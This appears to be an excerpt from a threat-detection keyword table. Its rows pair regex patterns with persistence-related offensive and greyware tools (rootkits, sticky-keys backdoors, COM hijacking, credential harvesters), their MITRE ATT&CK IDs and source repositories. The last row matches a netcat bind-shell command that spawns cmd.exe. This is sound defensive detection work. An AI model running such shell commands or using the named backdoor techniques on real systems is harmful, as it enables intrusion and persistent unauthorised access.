344*[+] Updated Elevated HKLM:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon key UserInit*.{0,1000}\[\+\]\sUpdated\sElevated\sHKLM\:Software\\\\Microsoft\\\\Windows\sNT\\\\CurrentVersion\\\\Winlogon\skey\sUserInit.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10#contentN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z13379
345*[+] User * added to /etc/passwd with root privileges.*.{0,1000}\[\+\]\sUser\s.{0,1000}\sadded\sto\s\/etc\/passwd\swith\sroot\sprivileges\..{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13385
346*[+] User * has been modified to have UID 0 (root privileges).*.{0,1000}\[\+\]\sUser\s.{0,1000}\shas\sbeen\smodified\sto\shave\sUID\s0\s\(root\sprivileges\)\..{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13386
347*[+] User persistence through the new * user established!*.{0,1000}\[\+\]\sUser\spersistence\sthrough\sthe\snew\s.{0,1000}\suser\sestablished!.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13388
348*[+] Using WMI to set WMI SD*.{0,1000}\[\+\]\sUsing\sWMI\sto\sset\sWMI\sSD.{0,1000}offensive_tool_keywordSharpPersistSDA Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machinesT1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/cybersectroll/SharpPersistSD10#contentN/A10187122024-05-15T14:55:14Z2024-05-13T15:11:12Z13413
349*[+] XDG persistence established!*.{0,1000}\[\+\]\sXDG\spersistence\sestablished!.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13421
350*[D3m0niz3d]~#*.{0,1000}\[D3m0niz3d\]\~\#.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell10#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z13450
351*[PRIVESC] Giving token full privileges for PID*.{0,1000}\[PRIVESC\]\sGiving\stoken\sfull\sprivileges\sfor\sPID.{0,1000}offensive_tool_keywordSunderWindows rootkit designed to work with BYOVD exploitsT1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/ColeHouston/Sunder10#contentN/A102183202025-01-18T10:41:50Z2025-01-10T03:57:05Z13499
352*[PRIVESC] Stealing token from PID *.{0,1000}\[PRIVESC\]\sStealing\stoken\sfrom\sPID\s.{0,1000}offensive_tool_keywordSunderWindows rootkit designed to work with BYOVD exploitsT1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/ColeHouston/Sunder10#contentN/A102183202025-01-18T10:41:50Z2025-01-10T03:57:05Z13500
353*\.\pipe\$77childproc*.{0,1000}\\\.\\pipe\\\$77childproc.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#namedpipeN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z13556
354*\.\pipe\$77childproc64*.{0,1000}\\\.\\pipe\\\$77childproc64.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#namedpipeN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z13557
355*\.\pipe\$77control_redirect*.{0,1000}\\\.\\pipe\\\$77control_redirect.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#namedpipeN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z13558
356*\\.\\pipe\\$77childproc*.{0,1000}\\\\\.\\\\pipe\\\\\$77childproc.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#namedpipeN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z13575
357*\\.\\pipe\\$77control_redirect*.{0,1000}\\\\\.\\\\pipe\\\\\$77control_redirect.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#namedpipeN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z13576
358*\\\\.\\Cronos*.{0,1000}\\\\\\\\\.\\\\Cronos.{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit10N/AN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z13623
359*\\\\.\\pipe\\$77childproc64*.{0,1000}\\\\\\\\\.\\\\pipe\\\\\$77childproc64.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#namedpipeN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z13625
360*\\pipe\\$77control*.{0,1000}\\\\pipe\\\\\$77control.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#namedpipeN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z13670
361*\2fac5c2a114c7896c33fb2b0a9f6443d\*.{0,1000}\\2fac5c2a114c7896c33fb2b0a9f6443d\\.{0,1000}offensive_tool_keywordXrulezXRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.T1078 - T1105 - T1059 - T1566TA0002 - TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/FSecureLABS/Xrulez10N/AN/A102162452018-12-11T16:33:08Z2016-08-31T10:10:10Z13733
362*\AbandonedCOMKeys.*.{0,1000}\\AbandonedCOMKeys\..{0,1000}offensive_tool_keywordAbandonedCOMKeysEnumerates abandoned COM keys (specifically InprocServer32). Useful for persistenceT1547.011 - T1049 - T1087.002TA0005 - TA0007 - TA0003N/AN/APersistencehttps://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys10N/AN/A101014162502023-02-06T14:56:26Z2019-02-06T00:32:29Z13773
363*\ABPTTS-master*.{0,1000}\\ABPTTS\-master.{0,1000}offensive_tool_keywordABPTTSTCP tunneling over HTTP/HTTPS for web application serversT1071.001 - T1573TA0003 - TA0011N/AN/APersistencehttps://github.com/nccgroup/ABPTTS10N/AN/A987351512016-08-12T19:36:24Z2016-07-29T21:45:57Z13774
364*\ADCS.ps1*.{0,1000}\\ADCS\.ps1.{0,1000}offensive_tool_keywordPoshADCSattack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)T1213.003 - T1213 - T1098.003 - T1098 - T1484.001TA0002 - TA0003 - TA0040N/AN/APersistencehttps://github.com/cfalta/PoshADCS10N/AN/A72186172021-07-07T16:47:07Z2019-10-15T15:54:03Z13804
365*\Add-KeeThiefLurker.ps1*.{0,1000}\\Add\-KeeThiefLurker\.ps1.{0,1000}offensive_tool_keywordPowerlurkPowerLurk is a PowerShell toolset for building malicious WMI Event SubsriptionsT1084 - T1059.001 - T1546.003 - T1053.005TA0003 - TA0005 - TA0002 - TA0006N/AN/APersistencehttps://github.com/Sw4mpf0x/PowerLurk10N/AN/A104384722016-07-25T22:19:22Z2016-07-13T20:07:25Z13817
366*\AmsiProvider.cpp*.{0,1000}\\AmsiProvider\.cpp.{0,1000}offensive_tool_keywordAMSI-ProviderA fake AMSI Provider which can be used for persistenceT1546.013 - T1574.012TA0005 - TA0003N/AN/APersistencehttps://github.com/netbiosX/AMSI-Provider10N/AN/A102150162021-05-16T16:56:15Z2021-05-15T16:18:47Z13926
367*\AmsiProvider.sln*.{0,1000}\\AmsiProvider\.sln.{0,1000}offensive_tool_keywordAMSI-ProviderA fake AMSI Provider which can be used for persistenceT1546.013 - T1574.012TA0005 - TA0003N/AN/APersistencehttps://github.com/netbiosX/AMSI-Provider10N/AN/A102150162021-05-16T16:56:15Z2021-05-15T16:18:47Z13927
368*\AMSI-Provider-main*.{0,1000}\\AMSI\-Provider\-main.{0,1000}offensive_tool_keywordAMSI-ProviderA fake AMSI Provider which can be used for persistenceT1546.013 - T1574.012TA0005 - TA0003N/AN/APersistencehttps://github.com/netbiosX/AMSI-Provider10N/AN/A102150162021-05-16T16:56:15Z2021-05-15T16:18:47Z13928
369*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.bat*.{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.bat.{0,1000}greyware_tool_keyword_script in startup locationT1059 - T1037 - T1060TA0003N/AN/APersistenceN/A10N/AN/A57N/AN/AN/AN/A14080
370*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.cmd*.{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.cmd.{0,1000}greyware_tool_keyword_script in startup locationT1059 - T1037 - T1060TA0003N/AN/APersistenceN/A10N/AN/A57N/AN/AN/AN/A14081
371*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.hta*.{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.hta.{0,1000}greyware_tool_keyword_script in startup locationT1059 - T1037 - T1060TA0003N/AN/APersistenceN/A10N/AN/A57N/AN/AN/AN/A14082
372*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.ps1*.{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.ps1.{0,1000}greyware_tool_keyword_script in startup locationT1059 - T1037 - T1060TA0003N/AN/APersistenceN/A10N/AN/A57N/AN/AN/AN/A14083
373*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs*.{0,1000}\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\.vbs.{0,1000}greyware_tool_keyword_script in startup locationT1059 - T1037 - T1060TA0003N/AN/APersistenceN/A10N/AN/A57N/AN/AN/AN/A14084
374*\AtNow \\*.{0,1000}\\AtNow\s\\\\.{0,1000}greyware_tool_keywordatnowAtNow is a command-line utility that schedules programs and commands to run in the near future - abused by TAT1053 - T1059TA0002 N/AAPT18 - APT29 - APT32 - Cobalt - RTMPersistencehttps://www.nirsoft.net/utils/atnow.html10N/AN/A77N/AN/AN/AN/A14133
375*\atnow.exe*.{0,1000}\\atnow\.exe.{0,1000}greyware_tool_keywordatnowAtNow is a command-line utility that schedules programs and commands to run in the near future - abused by TAT1053 - T1059TA0002 N/AAPT18 - APT29 - APT32 - Cobalt - RTMPersistencehttps://www.nirsoft.net/utils/atnow.html10N/AN/A77N/AN/AN/AN/A14134
376*\atnow.zip*.{0,1000}\\atnow\.zip.{0,1000}greyware_tool_keywordatnowAtNow is a command-line utility that schedules programs and commands to run in the near future - abused by TAT1053 - T1059TA0002 N/AAPT18 - APT29 - APT32 - Cobalt - RTMPersistencehttps://www.nirsoft.net/utils/atnow.html10N/AN/A77N/AN/AN/AN/A14135
377*\autodiscover\brute.go*.{0,1000}\\autodiscover\\brute\.go.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler10N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z14148
378*\backdoor.bat*.{0,1000}\\backdoor\.bat.{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor10N/AN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z14190
379*\backdoor.exe*.{0,1000}\\backdoor\.exe.{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor10N/AN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z14191
380*\backdoor\backdoor.mk*.{0,1000}\\backdoor\\backdoor\.mk.{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor10N/AN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z14194
381*\backdoor\backdoor.project*.{0,1000}\\backdoor\\backdoor\.project.{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor10N/AN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z14195
382*\backdoor_new.bat*.{0,1000}\\backdoor_new\.bat.{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor10N/AN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z14196
383*\bin\Release\SchTask.exe*.{0,1000}\\bin\\Release\\SchTask\.exe.{0,1000}offensive_tool_keywordSchTask_0x727create hidden scheduled tasksT1053TA0005 - TA0003N/AN/APersistencehttps://github.com/0x727/SchTask_0x72710N/AN/A1065321122021-09-01T01:34:51Z2021-08-30T03:29:34Z14307
384*\browserhistory.csv*.{0,1000}\\browserhistory\.csv.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z14394
385*\browsinghistoryview\browsinghistoryview64.exe*.{0,1000}\\browsinghistoryview\\browsinghistoryview64\.exe.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z14398
386*\chisel_x32*.{0,1000}\\chisel_x32.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell10#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z14506
387*\chisel_x64*.{0,1000}\\chisel_x64.{0,1000}offensive_tool_keywordD3m0n1z3dShellDemonized Shell is an Advanced Tool for persistence in linuxT1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011N/AN/APersistencehttps://github.com/MatheuZSecurity/D3m0n1z3dShell10#linuxN/A104373542025-01-05T13:56:51Z2023-05-30T02:30:47Z14507
388*\chromepasswordlist.csv*.{0,1000}\\chromepasswordlist\.csv.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z14522
389*\chromepasswords.py*.{0,1000}\\chromepasswords\.py.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z14523
390*\COM-Hunter.csproj*.{0,1000}\\COM\-Hunter\.csproj.{0,1000}offensive_tool_keywordCOM-HunterCOM-hunter is a COM Hijacking persistnce tool written in C#T1122 - T1055.012TA0003 - TA0005N/AN/APersistencehttps://github.com/nickvourd/COM-Hunter10N/AN/A103289482025-03-11T04:49:55Z2022-05-26T19:34:59Z14581
391*\COM-Hunter.exe*.{0,1000}\\COM\-Hunter\.exe.{0,1000}offensive_tool_keywordCOM-HunterCOM-hunter is a COM Hijacking persistnce tool written in C#T1122 - T1055.012TA0003 - TA0005N/AN/APersistencehttps://github.com/nickvourd/COM-Hunter10N/AN/A103289482025-03-11T04:49:55Z2022-05-26T19:34:59Z14582
392*\COM-Hunter.sln*.{0,1000}\\COM\-Hunter\.sln.{0,1000}offensive_tool_keywordCOM-HunterCOM-hunter is a COM Hijacking persistnce tool written in C#T1122 - T1055.012TA0003 - TA0005N/AN/APersistencehttps://github.com/nickvourd/COM-Hunter10N/AN/A103289482025-03-11T04:49:55Z2022-05-26T19:34:59Z14583
393*\COM-Object-hijacking-master*.{0,1000}\\COM\-Object\-hijacking\-master.{0,1000}offensive_tool_keywordCOM-Object-hijackinguse COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)T1546.015TA0003N/AN/APersistencehttps://github.com/3gstudent/COM-Object-hijacking10N/AN/A8158302017-08-04T09:19:40Z2017-08-04T08:15:36Z14596
394*\CreateService-master\*.{0,1000}\\CreateService\-master\\.{0,1000}offensive_tool_keywordCreateServiceCreating a persistent serviceT1543.003 - T1547.001 - T1050TA0003N/AN/APersistencehttps://github.com/uknowsec/CreateService10N/AN/A42105272021-04-26T06:43:12Z2020-09-23T05:03:52Z14653
395*\CreateService-master\CreateService\*.{0,1000}\\CreateService\-master\\CreateService\\.{0,1000}offensive_tool_keywordCreateServiceCreating a persistent serviceT1543.003 - T1547.001 - T1050TA0003N/AN/APersistencehttps://github.com/uknowsec/CreateService10N/AN/A42105272021-04-26T06:43:12Z2020-09-23T05:03:52Z14654
396*\Cronos Rootkit.sln*.{0,1000}\\Cronos\sRootkit\.sln.{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit10N/AN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z14677
397*\Cronos Rootkit\*.{0,1000}\\Cronos\sRootkit\\.{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit10N/AN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z14678
398*\CronosDebugger.vcxproj*.{0,1000}\\CronosDebugger\.vcxproj.{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit10N/AN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z14679
399*\Cronos-x64.zip*.{0,1000}\\Cronos\-x64\.zip.{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit10N/AN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z14680
400*\Data\WinAuditDB.mdb*.{0,1000}\\Data\\WinAuditDB\.mdb.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z14807
401*\diamorphine.c*.{0,1000}\\diamorphine\.c.{0,1000}offensive_tool_keywordDiamorphineLKM rootkit for Linux KernelsT1547.006 - T1548.002 - T1562.001 - T1027TA0003 - TA0004 - TA0005 - TA0006 - TA0007N/AN/APersistencehttps://github.com/m0nad/Diamorphine10#linuxN/A101019864512023-09-20T10:56:06Z2013-11-06T22:38:47Z14928
402*\diamorphine.h*.{0,1000}\\diamorphine\.h.{0,1000}offensive_tool_keywordDiamorphineLKM rootkit for Linux KernelsT1547.006 - T1548.002 - T1562.001 - T1027TA0003 - TA0004 - TA0005 - TA0006 - TA0007N/AN/APersistencehttps://github.com/m0nad/Diamorphine10#linuxN/A101019864512023-09-20T10:56:06Z2013-11-06T22:38:47Z14929
403*\doucme.csproj*.{0,1000}\\doucme\.csproj.{0,1000}offensive_tool_keyworddoucmeleverages the NetUserAdd Win32 API to create a new computer accountT1136 - T1098 - T1078TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Ben0xA/DoUCMe10N/AN/A9169182021-05-01T03:15:59Z2021-04-29T15:41:28Z15043
404*\doucme.exe*.{0,1000}\\doucme\.exe.{0,1000}offensive_tool_keyworddoucmeleverages the NetUserAdd Win32 API to create a new computer accountT1136 - T1098 - T1078TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Ben0xA/DoUCMe10N/AN/A9169182021-05-01T03:15:59Z2021-04-29T15:41:28Z15044
405*\doucme.sln*.{0,1000}\\doucme\.sln.{0,1000}offensive_tool_keyworddoucmeleverages the NetUserAdd Win32 API to create a new computer accountT1136 - T1098 - T1078TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Ben0xA/DoUCMe10N/AN/A9169182021-05-01T03:15:59Z2021-04-29T15:41:28Z15045
406*\DynastyPersist\src\*.sh*.{0,1000}\\DynastyPersist\\src\\.{0,1000}\.sh.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z15206
407*\ext_hijacker.h*.{0,1000}\\ext_hijacker\.h.{0,1000}offensive_tool_keywordpersistence_demosDemos of various (also non standard) persistence methods used by malwareT1546 - T1547 - T1133 - T1053 - T1037TA0003 N/AN/APersistencehttps://github.com/hasherezade/persistence_demos10N/AN/A73221472023-03-05T17:01:14Z2017-05-16T09:08:47Z15399
408*\hidden-cmd.bat*.{0,1000}\\hidden\-cmd\.bat.{0,1000}offensive_tool_keywordDispossessorscript used to install anydesk by the Dispossessor groupT1486 - T1490 - T1059 - T1213 - T1078TA0040 - TA0043 - TA0001 - TA0009N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A15786
409*\hijacker_app\src\ProxyApp.exe*.{0,1000}\\hijacker_app\\src\\ProxyApp\.exe.{0,1000}offensive_tool_keywordpersistence_demosDemos of various (also non standard) persistence methods used by malwareT1546 - T1547 - T1133 - T1053 - T1037TA0003 N/AN/APersistencehttps://github.com/hasherezade/persistence_demos10N/AN/A73221472023-03-05T17:01:14Z2017-05-16T09:08:47Z15801
410*\ImplantSSP.exe*.{0,1000}\\ImplantSSP\.exe.{0,1000}offensive_tool_keywordImplantSSPInstalls a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system startT1547.008 - T1073.001 - T1055.001TA0003 - TA0005N/AN/APersistencehttps://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP10N/AN/A101014162502023-02-06T14:56:26Z2019-02-06T00:32:29Z15900
411*\InstallShellcode.exe*.{0,1000}\\InstallShellcode\.exe.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10N/AN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z15923
412*\Invoke-mimikittenz.ps1*.{0,1000}\\Invoke\-mimikittenz\.ps1.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z15979
413*\JunctionFolder.csproj*.{0,1000}\\JunctionFolder\.csproj.{0,1000}offensive_tool_keywordJunctionFolderCreates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.T1547.001 - T1574.001 - T1204.002TA0005 - TA0004N/AN/APersistencehttps://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder10N/AN/A101014162502023-02-06T14:56:26Z2019-02-06T00:32:29Z16051
414*\logon_backdoor\*.{0,1000}\\logon_backdoor\\.{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor10N/AN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z16362
415*\logon_backdoor-master*.{0,1000}\\logon_backdoor\-master.{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor10N/AN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z16363
416*\nc.exe -Ldp * -e cmd.exe*.{0,1000}\\nc\.exe\s\-Ldp\s.{0,1000}\s\-e\scmd\.exe.{0,1000}greyware_tool_keywordncbackdoor with netcat - used by the Ransomware group DispossessorT1547.001 - T1059.003 - T1105TA0003 - TA0005 - TA0011N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A16742
